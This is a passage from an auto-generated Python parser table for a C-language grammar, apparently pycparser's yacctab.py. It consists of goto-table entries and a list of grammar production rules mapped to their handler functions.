,198,198,]),'initializer':([113,130,339,476,],[213,243,433,502,]),'assignment_expression_opt':([116,216,239,369,444,],[221,345,367,453,481,]),'typeid_noparen_declarator':([126,],[232,]),'abstract_declarator_opt':([126,277,],[233,388,]),'direct_typeid_noparen_declarator':([126,234,],[235,358,]),'abstract_declarator':([126,238,277,390,],[237,362,237,362,]),'direct_abstract_declarator':([126,234,238,277,364,389,390,],[241,359,241,241,359,359,241,]),'struct_declarator_list_opt':([145,],[255,]),'struct_declarator_list':([145,],[259,]),'struct_declarator':([145,378,],[260,456,]),'constant_expression':([164,248,262,343,379,],[268,374,380,436,457,]),'type_name':([168,271,328,332,335,],[275,383,428,429,430,]),'pragmacomp_or_statement':([172,267,272,382,460,463,464,507,522,525,],[281,381,384,458,490,493,494,518,526,528,]),'assignment_operator':([180,],[290,]),'initializer_list_opt':([215,],[336,]),'initializer_list':([215,461,],[337,492,]),'designation_opt':([215,432,461,509,],[339,476,339,476,]),'designation':([215,432,461,509,],[340,340,340,340,]),'designator_list':([215,432,461,509,],[341,341,341,341,]),'designator':([215,341,432,461,509,],[342,435,342,342,342,]),'parameter_type_list_opt':([238,370,390,],[363,455,363,]),'argument_expression_list':([322,],[421,]),'offsetof_member_designator':([474,],[500,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> translation_unit_or_empty","S'",1,None,None,None),
('abstract_declarator_opt -> empty','abstract_declarator_opt',1,'p_abstract_declarator_opt','plyparser.py',43),
('abstract_declarator_opt -> abstract_declarator','abstract_declarator_opt',1,'p_abstract_declarator_opt','plyparser.py',44),
('assignment_expression_opt -> empty','assignment_expression_opt',1,'p_assignment_expression_opt','plyparser.py',43),
('assignment_expression_opt -> assignment_expression','assignment_expression_opt',1,'p_assignment_expression_opt','plyparser.py',44),
('block_item_list_opt -> empty','block_item_list_opt',1,'p_block_item_list_opt','plyparser.py',43),
('block_item_list_opt -> block_item_list','block_item_list_opt',1,'p_block_item_list_opt','plyparser.py',44),
('declaration_list_opt -> empty','declaration_list_opt',1,'p_declaration_list_opt','plyparser.py',43),
('declaration_list_opt -> declaration_list','declaration_list_opt',1,'p_declaration_list_opt','plyparser.py',44),
('declaration_specifiers_no_type_opt -> empty','declaration_specifiers_no_type_opt',1,'p_declaration_specifiers_no_type_opt','plyparser.py',43),
('declaration_specifiers_no_type_opt -> declaration_specifiers_no_type','declaration_specifiers_no_type_opt',1,'p_declaration_specifiers_no_type_opt','plyparser.py',44),
('designation_opt -> empty','designation_opt',1,'p_designation_opt','plyparser.py',43),
('designation_opt -> designation','designation_opt',1,'p_designation_opt','plyparser.py',44),
('expression_opt -> empty','expression_opt',1,'p_expression_opt','plyparser.py',43),
('expression_opt -> expression','expression_opt',1,'p_expression_opt','plyparser.py',44),
('id_init_declarator_list_opt -> empty','id_init_declarator_list_opt',1,'p_id_init_declarator_list_opt','plyparser.py',43),
('id_init_declarator_list_opt -> id_init_declarator_list','id_init_declarator_list_opt',1,'p_id_init_declarator_list_opt','plyparser.py',44),
('identifier_list_opt -> empty','identifier_list_opt',1,'p_identifier_list_opt','plyparser.py',43),
('identifier_list_opt -> identifier_list','identifier_list_opt',1,'p_identifier_list_opt','plyparser.py',44),
('init_declarator_list_opt -> empty','init_declarator_list_opt',1,'p_init_declarator_list_opt','plyparser.py',43),
('init_declarator_list_opt -> init_declarator_list','init_declarator_list_opt',1,'p_init_declarator_list_opt','plyparser.py',44),
('initializer_list_opt -> empty','initializer_list_opt',1,'p_initializer_list_opt','plyparser.py',43),
('initializer_list_opt -> initializer_list','initializer_list_opt',1,'p_initializer_list_opt','plyparser.py',44),
('parameter_type_list_opt -> empty','parameter_type_list_opt',1,'p_parameter_type_list_opt','plyparser.py',43),
('parameter_type_list_opt -> parameter_type_list','parameter_type_list_opt',1,'p_parameter_type_list_opt','plyparser.py',44),
('struct_declarator_list_opt -> empty','struct_declarator_list_opt',1,'p_struct_declarator_list_opt','plyparser.py',43),
('struct_declarator_list_opt -> struct_declarator_list','struct_declarator_list_opt',1,'p_struct_declarator_list_opt','plyparser.py',44),
('type_qualifier_list_opt -> empty','type_qualifier_list_opt',1,'p_type_qualifier_list_opt','plyparser.py',43),
('type_qualifier_list_opt -> type_qualifier_list','type_qualifier_list_opt',1,'p_type_qualifier_list_opt','plyparser.py',44),
('direct_id_declarator -> ID','direct_id_declarator',1,'p_direct_id_declarator_1','plyparser.py',126),
('direct_id_declarator -> LPAREN id_declarator RPAREN','direct_id_declarator',3,'p_direct_id_declarator_2','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_id_declarator',5,'p_direct_id_declarator_3','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_id_declarator',6,'p_direct_id_declarator_4','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_id_declarator',6,'p_direct_id_declarator_4','plyparser.py',127),
('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_id_declarator',5,'p_direct_id_declarator_5','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LPAREN parameter_type_list RPAREN','direct_id_declarator',4,'p_direct_id_declarator_6','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LPAREN identifier_list_opt RPAREN','direct_id_declarator',4,'p_direct_id_declarator_6','plyparser.py',127),
('direct_typeid_declarator -> TYPEID','direct_typeid_declarator',1,'p_direct_typeid_declarator_1','plyparser.py',126),
('direct_typeid_declarator -> LPAREN typeid_declarator RPAREN','direct_typeid_declarator',3,'p_direct_typeid_declarator_2','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_typeid_declarator',5,'p_direct_typeid_declarator_3','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_typeid_declarator',6,'p_direct_typeid_declarator_4','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_typeid_declarator',6,'p_direct_typeid_declarator_4','plyparser.py',127),
('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_typeid_declarator',5,'p_direct_typeid_declarator_5','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LPAREN parameter_type_list RPAREN','direct_typeid_declarator',4,'p_direct_typeid_declarator_6','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LPAREN identifier_list_opt RPAREN','direct_typeid_declarator',4,'p_direct_typeid_declarator_6','plyparser.py',127),
('direct_typeid_noparen_declarator -> TYPEID','direct_typeid_noparen_declarator',1,'p_direct_typeid_noparen_declarator_1','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_typeid_noparen_declarator',5,'p_direct_typeid_noparen_declarator_3','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_typeid_noparen_declarator',6,'p_direct_typeid_noparen_declarator_4','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_typeid_noparen_declarator',6,'p_direct_typeid_noparen_declarator_4','plyparser.py',127),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_typeid_noparen_declarator',5,'p_direct_typeid_noparen_declarator_5','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LPAREN parameter_type_list RPAREN','direct_typeid_noparen_declarator',4,'p_direct_typeid_noparen_declarator_6','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LPAREN identifier_list_opt RPAREN','direct_typeid_noparen_declarator',4,'p_direct_typeid_noparen_declarator_6','plyparser.py',127),
('id_declarator -> direct_id_declarator','id_declarator',1,'p_id_declarator_1','plyparser.py',126),
('id_declarator -> pointer direct_id_declarator','id_declarator',2,'p_id_declarator_2','plyparser.py',126),
('typeid_declarator -> direct_typeid_declarator','typeid_declarator',1,'p_typeid_declarator_1','plyparser.py',126),
('typeid_declarator -> pointer direct_typeid_declarator','typeid_declarator',2,'p_typeid_declarator_2','plyparser.py',126),
('typeid_noparen_declarator -> direct_typeid_noparen_declarator','typeid_noparen_declarator',1,'p_typeid_noparen_declarator_1','plyparser.py',126),
('typeid_noparen_declarator -> pointer direct_typeid_noparen_declarator','typeid_noparen_declarator',2,'p_typeid_noparen_declarator_2','plyparser.py',126),
('translation_unit_or_empty -> translation_unit','translation_unit_or_empty',1,'p_translation_unit_or_empty','parser.py',547),
('translation_unit_or_empty -> empty','translation_unit_or_empty',1,'p_translation_unit_or_empty','parser.py',548),
('translation_unit -> external_declaration','translation_unit',1,'p_translation_unit_1','parser.py',556),
('translation_unit -> translation_unit external_declaration','translation_unit',2,'p_translation_unit_2','parser.py',563),
('external_declaration -> function_definition','external_declaration',1,'p_external_declaration_1','parser.py',574),
('external_declaration -> declaration','external_declaration',1,'p_external_declaration_2','parser.py',579),
('external_declaration -> pp_directive','external_declaration',1,'p_external_declaration_3','parser.py',584),
('external_declaration -> pppragma_directive','external_declaration',1,'p_external_declaration_3','parser.py',585),
('external_declaration -> SEMI','external_declaration',1,'p_external_declaration_4','parser.py',590),
('pp_directive -> PPHASH','pp_directive',1,'p_pp_directive','parser.py',595),
('pppragma_directive -> PPPRAGMA','pppragma_directive',1,'p_pppragma_directive','parser.py',601),
('pppragma_directive -> PPPRAGMA PPPRAGMASTR','pppragma_directive',2,'p_pppragma_directive','parser.py',602),
('function_definition -> id_declarator declaration_list_opt compound_statement','function_definition',3,'p_function_definition_1','parser.py',613),
('function_definition -> declaration_specifiers id_declarator declaration_list_opt compound_statement','function_definition',4,'p_function_definition_2','parser.py',630),
('statement -> labeled_statement','statement',1,'p_statement','parser.py',641),
('statement -> expression_statement','statement',1,'p_statement','parser.py',642),
('statement -> compound_statement','statement',1,'p_statement','parser.py',643),
('statement -> selection_statement','statement',1,'p_statement','parser.py',644),
('statement -> iteration_statement','statement',1,'p_statement','parser.py',645),
('statement -> jump_statement','statement',1,'p_statement','parser.py',646),
('statement -> pppragma_directive','statement',1,'p_statement','parser.py',647),
('pragmacomp_or_statement -> pppragma_directive statement','pragmacomp_or_statement',2,'p_pragmacomp_or_statement','parser.py',694),
('pragmacomp_or_statement -> statement','pragmacomp_or_statement',1,'p_pragmacomp_or_statement','parser.py',695),
('decl_body -> declaration_specifiers init_declarator_list_opt','decl_body',2,'p_decl_body','parser.py',714),
('decl_body -> declaration_specifiers_no_type id_init_declarator_list_opt','decl_body',2,'p_decl_body','parser.py',715),
('declaration -> decl_body SEMI','declaration',2,'p_declaration','parser.py',774),
('declaration_list -> declaration','declaration_list',1,'p_declaration_list','parser.py',783),
('declaration_list -> declaration_list declaration','declaration_list',2,'p_declaration_list','parser.py',784),
('declaration_specifiers_no_type -> type_qualifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_1','parser.py',794),
('declaration_specifiers_no_type -> storage_class_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_2','parser.py',799),
('declaration_specifiers_no_type -> function_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_3','parser.py',804),
('declaration_specifiers -> declaration_specifiers type_qualifier','declaration_specifiers',2,'p_declaration_specifiers_1','parser.py',810),
('declaration_specifiers -> declaration_specifiers storage_class_specifier','declaration_specifiers',2,'p_declaration_specifiers_2','parser.py',815),
('declaration_specifiers -> declaration_specifiers function_specifier','declaration_specifiers',2,'p_declaration_specifiers_3','parser.py',820),
('declaration_specifiers -> declaration_specifiers type_specifier_no_typeid','declaration_specifiers',2,'p_declaration_specifiers_4','parser.py',825),
('declaration_specifiers -> type_specifier','declaration_specifiers',1,'p_declaration_specifiers_5','parser.py',830),
('declaration_specifiers -> declaration_specifiers_no_type type_specifier','declaration_specifiers',2,'p_declaration_specifiers_6','parser.py',835),
('storage_class_specifier -> AUTO','storage_class_specifier',1,'p_storage_class_specifier','parser.py',841),
('storage_class_specifier -> REGISTER','storage_class_specifier',1,'p_storage_class_specifier','parser.py',842),
('storage_class_specifier -> STATIC','storage_class_specifier',1,'p_storage_class_specifier','parser.py',843),
('storage_class_specifier -> EXTERN','storage_class_specifier',1,'p_storage_class_specifier','parser.py',844),
('storage_class_specifier -> TYPEDEF','storage_class_specifier',1,'p_storage_class_specifier','parser.py',845),
('function_specifier -> INLINE','function_specifier',1,'p_function_specifier','parser.py',850),
('type_specifier_no_typeid -> VOID','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',855),
('type_specifier_no_typeid -> _BOOL','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',856),
('type_specifier_no_typeid -> CHAR','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',857),
('type_specifier_no_typeid -> SHORT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',858),
('type_specifier_no_typeid -> INT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',859),
('type_specifier_no_typeid -> LONG','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',860),
('type_specifier_no_typeid -> FLOAT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',861),
('type_specifier_no_typeid -> DOUBLE','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',862),
('type_specifier_no_typeid -> _COMPLEX','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',863),
('type_specifier_no_typeid -> SIGNED','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',864),
('type_specifier_no_typeid -> UNSIGNED','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',865),
('type_specifier_no_typeid -> __INT128','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',866),
('type_specifier -> typedef_name','type_specifier',1,'p_type_specifier','parser.py',871),
('type_specifier -> enum_specifier','type_specifier',1,'p_type_specifier','parser.py',872),
('type_specifier -> struct_or_union_specifier','type_specifier',1,'p_type_specifier','parser.py',873),
('type_specifier -> type_specifier_no_typeid','type_specifier',1,'p_type_specifier','parser.py',874),
('type_qualifier -> CONST','type_qualifier',1,'p_type_qualifier','parser.py',879),
('type_qualifier -> RESTRICT','type_qualifier',1,'p_type_qualifier','parser.py',880),
('type_qualifier -> VOLATILE','type_qualifier',1,'p_type_qualifier','parser.py',881),
('init_declarator_list -> init_declarator','init_declarator_list',1,'p_init_declarator_list','parser.py',886),
('init_declarator_list -> init_declarator_list COMMA init_declarator','init_declarator_list',3,'p_init_declarator_list','parser.py',887),
('init_declarator -> declarator','init_declarator',1,'p_init_declarator','parser.py',895),
('init_declarator -> declarator EQUALS initializer','init_declarator',3,'p_init_declarator','parser.py',896),
('id_init_declarator_list -> id_init_declarator','id_init_declarator_list',1,'p_id_init_declarator_list','parser.py',901),
('id_init_declarator_list -> id_init_declarator_list COMMA init_declarator','id_init_declarator_list',3,'p_id_init_declarator_list','parser.py',902),
('id_init_declarator -> id_declarator','id_init_declarator',1,'p_id_init_declarator','parser.py',907),
('id_init_declarator -> id_declarator EQUALS initializer','id_init_declarator',3,'p_id_init_declarator','parser.py',908),
('specifier_qualifier_list -> specifier_qualifier_list type_specifier_no_typeid','specifier_qualifier_list',2,'p_specifier_qualifier_list_1','parser.py',915),
('specifier_qualifier_list -> specifier_qualifier_list type_qualifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_2','parser.py',920),
('specifier_qualifier_list -> type_specifier','specifier_qualifier_list',1,'p_specifier_qualifier_list_3','parser.py',925),
('specifier_qualifier_list -> type_qualifier_list type_specifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_4','parser.py',930),
('struct_or_union_specifier -> struct_or_union ID','struct_or_union_specifier',2,'p_struct_or_union_specifier_1','parser.py',939),
('struct_or_union_specifier -> struct_or_union TYPEID','struct_or_union_specifier',2,'p_struct_or_union_specifier_1','parser.py',940),
('struct_or_union_specifier -> struct_or_union brace_open struct_declaration_list brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_2','parser.py',950),
('struct_or_union_specifier -> struct_or_union brace_open brace_close','struct_or_union_specifier',3,'p_struct_or_union_specifier_2','parser.py',951),
('struct_or_union_specifier -> struct_or_union ID brace_open struct_declaration_list brace_close','struct_or_union_specifier',5,'p_struct_or_union_specifier_3','parser.py',968),
('struct_or_union_specifier -> struct_or_union ID brace_open brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_3','parser.py',969),
('struct_or_union_specifier -> struct_or_union TYPEID brace_open struct_declaration_list brace_close','struct_or_union_specifier',5,'p_struct_or_union_specifier_3','parser.py',970),
('struct_or_union_specifier -> struct_or_union TYPEID brace_open brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_3','parser.py',971),
('struct_or_union -> STRUCT','struct_or_union',1,'p_struct_or_union','parser.py',987),
('struct_or_union -> UNION','struct_or_union',1,'p_struct_or_union','parser.py',988),
('struct_declaration_list -> struct_declaration','struct_declaration_list',1,'p_struct_declaration_list','parser.py',995),
('struct_declaration_list -> struct_declaration_list struct_declaration','struct_declaration_list',2,'p_struct_declaration_list','parser.py',996),
('struct_declaration -> specifier_qualifier_list struct_declarator_list_opt SEMI','struct_declaration',3,'p_struct_declaration_1','parser.py',1004),
('struct_declaration -> SEMI','struct_declaration',1,'p_struct_declaration_2','parser.py',1042),
('struct_declaration -> pppragma_directive','struct_declaration',1,'p_struct_declaration_3','parser.py',1047),
('struct_declarator_list -> struct_declarator','struct_declarator_list',1,'p_struct_declarator_list','parser.py',1052),
('struct_declarator_list -> struct_declarator_list COMMA struct_declarator','struct_declarator_list',3,'p_struct_declarator_list','parser.py',1053),
('struct_declarator -> declarator','struct_declarator',1,'p_struct_declarator_1','parser.py',1061),
('struct_declarator -> declarator COLON constant_expression','struct_declarator',3,'p_struct_declarator_2','parser.py',1066),
('struct_declarator -> COLON constant_expression','struct_declarator',2,'p_struct_declarator_2','parser.py',1067),
('enum_specifier -> ENUM ID','enum_specifier',2,'p_enum_specifier_1','parser.py',1075),
('enum_specifier -> ENUM TYPEID','enum_specifier',2,'p_enum_specifier_1','parser.py',1076),
('enum_specifier -> ENUM brace_open enumerator_list brace_close','enum_specifier',4,'p_enum_specifier_2','parser.py',1081),
('enum_specifier -> ENUM ID brace_open enumerator_list brace_close','enum_specifier',5,'p_enum_specifier_3','parser.py',1086),
('enum_specifier -> ENUM TYPEID brace_open enumerator_list brace_close','enum_specifier',5,'p_enum_specifier_3','parser.py',1087),
('enumerator_list -> enumerator','enumerator_list',1,'p_enumerator_list','parser.py',1092),
('enumerator_list -> enumerator_list COMMA','enumerator_list',2,'p_enumerator_list','parser.py',1093),
('enumerator_list -> enumerator_list COMMA enumerator','enumerator_list',3,'p_enumerator_list','parser.py',1094),
('enumerator -> ID','enumerator',1,'p_enumerator','parser.py',1105),
('enumerator -> ID EQUALS constant_expression','enumerator',3,'p_enumerator','parser.py',1106),
('declarator -> id_declarator','declarator',1,'p_declarator','parser.py',1121),
('declarator -> typeid_declarator','declarator',1,'p_declarator','parser.py',1122),
('pointer -> TIMES type_qualifier_list_opt','pointer',2,'p_pointer','parser.py',1233),
('pointer -> TIMES type_qualifier_list_opt pointer','pointer',3,'p_pointer','parser.py',1234),
('type_qualifier_list -> type_qualifier','type_qualifier_list',1,'p_type_qualifier_list','parser.py',1263),
('type_qualifier_list -> type_qualifier_list type_qualifier','type_qualifier_list',2,'p_type_qualifier_list','parser.py',1264),
('parameter_type_list -> parameter_list','parameter_type_list',1,'p_parameter_type_list','parser.py',1269),
('parameter_type_list -> parameter_list COMMA ELLIPSIS','parameter_type_list',3,'p_parameter_type_list','parser.py',1270),
('parameter_list -> parameter_declaration','parameter_list',1,'p_parameter_list','parser.py',1278),
('parameter_list -> parameter_list COMMA parameter_declaration','parameter_list',3,'p_parameter_list','parser.py',1279),
('parameter_declaration -> declaration_specifiers id_declarator','parameter_declaration',2,'p_parameter_declaration_1','parser.py',1298),
('parameter_declaration -> declaration_specifiers typeid_noparen_declarator','parameter_declaration',2,'p_parameter_declaration_1','parser.py',1299),
('parameter_declaration -> declaration_specifiers abstract_declarator_opt','parameter_declaration',2,'p_parameter_declaration_2','parser.py',1310),
('identifier_list -> identifier','identifier_list',1,'p_identifier_list','parser.py',1341),
('identifier_list -> identifier_list COMMA identifier','identifier_list',3,'p_identifier_list','parser.py',1342),
('initializer -> assignment_expression','initializer',1,'p_initializer_1','parser.py',1351),
('initializer -> brace_open initializer_list_opt brace_close','initializer',3,'p_initializer_2','parser.py',1356),
('initializer -> brace_open initializer_list COMMA brace_close','initializer',4,'p_initializer_2','parser.py',1357),
('initializer_list -> designation_opt initializer','initializer_list',2,'p_initializer_list','parser.py',1365),
('initializer_list -> initializer_list COMMA designation_opt initializer','initializer_list',4,'p_initializer_list','parser.py',1366),
('designation -> designator_list EQUALS','designation',2,'p_designation','parser.py',1377),
('designator_list -> designator','designator_list',1,'p_designator_list','parser.py',1385),
('designator_list -> designator_list designator','designator_list',2,'p_designator_list','parser.py',1386),
('designator -> LBRACKET constant_expression RBRACKET','designator',3,'p_designator','parser.py',1391),
('designator -> PERIOD identifier','designator',2,'p_designator','parser.py',1392),
('type_name -> specifier_qualifier_list abstract_declarator_opt','type_name',2,'p_type_name','parser.py',1397),
('abstract_declarator -> pointer','abstract_declarator',1,'p_abstract_declarator_1','parser.py',1408),
('abstract_declarator -> pointer direct_abstract_declarator','abstract_declarator',2,'p_abstract_declarator_2','parser.py',1416),
('abstract_declarator -> direct_abstract_declarator','abstract_declarator',1,'p_abstract_declarator_3','parser.py',1421),
('direct_abstract_declarator -> LPAREN abstract_declarator RPAREN','direct_abstract_declarator',3,'p_direct_abstract_declarator_1','parser.py',1431),
('direct_abstract_declarator -> direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_2','parser.py',1435),
('direct_abstract_declarator -> LBRACKET assignment_expression_opt RBRACKET','direct_abstract_declarator',3,'p_direct_abstract_declarator_3','parser.py',1446),
('direct_abstract_declarator -> direct_abstract_declarator LBRACKET TIMES RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_4','parser.py',1455),
('direct_abstract_declarator -> LBRACKET TIMES RBRACKET','direct_abstract_declarator',3,'p_direct_abstract_declarator_5','parser.py',1466),
('direct_abstract_declarator -> direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN','direct_abstract_declarator',4,'p_direct_abstract_declarator_6','parser.py',1475),
('direct_abstract_declarator -> LPAREN parameter_type_list_opt RPAREN','direct_abstract_declarator',3,'p_direct_abstract_declarator_7','parser.py',1485),
('block_item -> declaration','block_item',1,'p_block_item','parser.py',1496),
('block_item -> statement','block_item',1,'p_block_item','parser.py',1497),
('block_item_list -> block_item','block_item_list',1,'p_block_item_list','parser.py',1504),
('block_item_list -> block_item_list block_item','block_item_list',2,'p_block_item_list','parser.py',1505),
('compound_statement -> brace_open block_item_list_opt brace_close','compound_statement',3,'p_compound_statement_1','parser.py',1511),
('labeled_statement -> ID COLON pragmacomp_or_statement','labeled_statement',3,'p_labeled_statement_1','parser.py',1517),
('labeled_statement -> CASE constant_expression COLON pragmacomp_or_statement','labeled_statement',4,'p_labeled_statement_2','parser.py',1521),
('labeled_statement -> DEFAULT COLON pragmacomp_or_statement','labeled_statement',3,'p_labeled_statement_3','parser.py',1525),
('selection_statement -> IF LPAREN expression RPAREN pragmacomp_or_statement','selection_statement',5,'p_selection_statement_1','parser.py',1529),
('selection_statement -> IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement','selection_statement',7,'p_selection_statement_2','parser.py',1533),
('selection_statement -> SWITCH LPAREN expression RPAREN pragmacomp_or_statement','selection_statement',5,'p_selection_statement_3','parser.py',1537),
('iteration_statement -> WHILE LPAREN expression RPAREN pragmacomp_or_statement','iteration_statement',5,'p_iteration_statement_1','parser.py',1542),
('iteration_statement -> DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI','iteration_statement',7,'p_iteration_statement_2','parser.py',1546),
('iteration_statement -> FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement','iteration_statement',9,'p_iteration_statement_3','parser.py',1550),
('iteration_statement -> FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement','iteration_statement',8,'p_iteration_statement_4','parser.py',1554),
('jump_statement -> GOTO ID SEMI','jump_statement',3,'p_jump_statement_1','parser.py',1559),
('jump_statement -> BREAK SEMI','jump_statement',2,'p_jump_statement_2','parser.py',1563),
('jump_statement -> CONTINUE SEMI','jump_statement',2,'p_jump_statement_3','parser.py',1567),
('jump_statement -> RETURN expression SEMI','jump_statement',3,'p_jump_statement_4','parser.py',1571),
('jump_statement -> RETURN SEMI','jump_statement',2,'p_jump_statement_4','parser.py',1572),
('expression_statement -> expression_opt SEMI','expression_statement',2,'p_expression_statement','parser.py',1577),
('expression -> assignment_expression','expression',1,'p_expression','parser.py',1584),
('expression -> expression COMMA assignment_expression','expression',3,'p_expression','parser.py',1585),
('typedef_name -> TYPEID','typedef_name',1,'p_typedef_name','parser.py',1597),
('assignment_expression -> conditional_expression','assignment_expression',1,'p_assignment_expression','parser.py',1601),
('assignment_expression -> unary_expression assignment_operator assignment_expression','assignment_expression',3,'p_assignment_expression','parser.py',1602),
('assignment_operator -> EQUALS','assignment_operator',1,'p_assignment_operator','parser.py',1615),
('assignment_operator -> XOREQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1616),
('assignment_operator -> TIMESEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1617),
('assignment_operator -> DIVEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1618),
('assignment_operator -> MODEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1619),
('assignment_operator -> PLUSEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1620),
('assignment_operator -> MINUSEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1621),
('assignment_operator -> LSHIFTEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1622),
('assignment_operator -> RSHIFTEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1623),
('assignment_operator -> ANDEQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1624),
('assignment_operator -> OREQUAL','assignment_operator',1,'p_assignment_operator','parser.py',1625),
('constant_expression -> conditional_expression','constant_expression',1,'p_constant_expression','parser.py',1630),
('conditional_expression -> binary_expression','conditional_expression',1,'p_conditional_expression','parser.py',1634),
('conditional_expression -> binary_expression CONDOP expression COLON conditional_expression','conditional_expression',5,'p_conditional_expression','parser.py',1635),
('binary_expression -> cast_expression','binary_expression',1,'p_binary_expression','parser.py',1643),
('binary_expression -> binary_expression TIMES binary_expression','binary_expression',3,'p_binary_expression','parser.py',1644),
('binary_expression -> binary_expression DIVIDE binary_expression','binary_expression',3,'p_binary_expression','parser.py',1645),
('binary_expression -> binary_expression MOD binary_expression','binary_expression',3,'p_binary_expression','parser.py',1646),
('binary_expression -> binary_expression PLUS binary_expression','binary_expression',3,'p_binary_expression','parser.py',1647),
('binary_expression -> binary_expression MINUS binary_expression','binary_expression',3,'p_binary_expression','parser.py',1648),
('binary_expression -> binary_expression RSHIFT binary_expression','binary_expression',3,'p_binary_expression','parser.py',1649),
('binary_expression -> binary_expression LSHIFT binary_expression','binary_expression',3,'p_binary_expression','parser.py',1650),
('binary_expression -> binary_expression LT binary_expression','binary_expression',3,'p_binary_expression','parser.py',1651),
('binary_expression -> binary_expression LE binary_expression','binary_expression',3,'p_binary_expression','parser.py',1652),
('binary_expression -> binary_expression GE binary_expression','binary_expression',3,'p_binary_expression','parser.py',1653),
('binary_expression -> binary_expression GT binary_expression','binary_expression',3,'p_binary_expression','parser.py',1654),
('binary_expression -> binary_expression EQ binary_expression','binary_expression',3,'p_binary_expression','parser.py',1655),
('binary_expression -> binary_expression NE binary_expression','binary_expression',3,'p_binary_expression','parser.py',1656),
('binary_expression -> binary_expression AND binary_expression','binary_expression',3,'p_binary_expression','parser.py',1657),
('binary_expression -> binary_expression OR binary_expression','binary_expression',3,'p_binary_expression','parser.py',1658),
('binary_expression -> binary_expression XOR binary_expression','binary_expression',3,'p_binary_expression','parser.py',1659),
('binary_expression -> binary_expression LAND binary_expression','binary_expression',3,'p_binary_expression','parser.py',1660),
('binary_expression -> binary_expression LOR binary_expression','binary_expression',3,'p_binary_expression','parser.py',1661),
('cast_expression -> unary_expression','cast_expression',1,'p_cast_expression_1','parser.py',1669),
('cast_expression -> LPAREN type_name RPAREN cast_expression','cast_expression',4,'p_cast_expression_2','parser.py',1673),
('unary_expression -> postfix_expression','unary_expression',1,'p_unary_expression_1','parser.py',1677),
('unary_expression -> PLUSPLUS unary_expression','unary_expression',2,'p_unary_expression_2','parser.py',1681),
('unary_expression -> MINUSMINUS unary_expression','unary_expression',2,'p_unary_expression_2','parser.py',1682),
('unary_expression -> unary_operator cast_expression','unary_expression',2,'p_unary_expression_2','parser.py',1683),
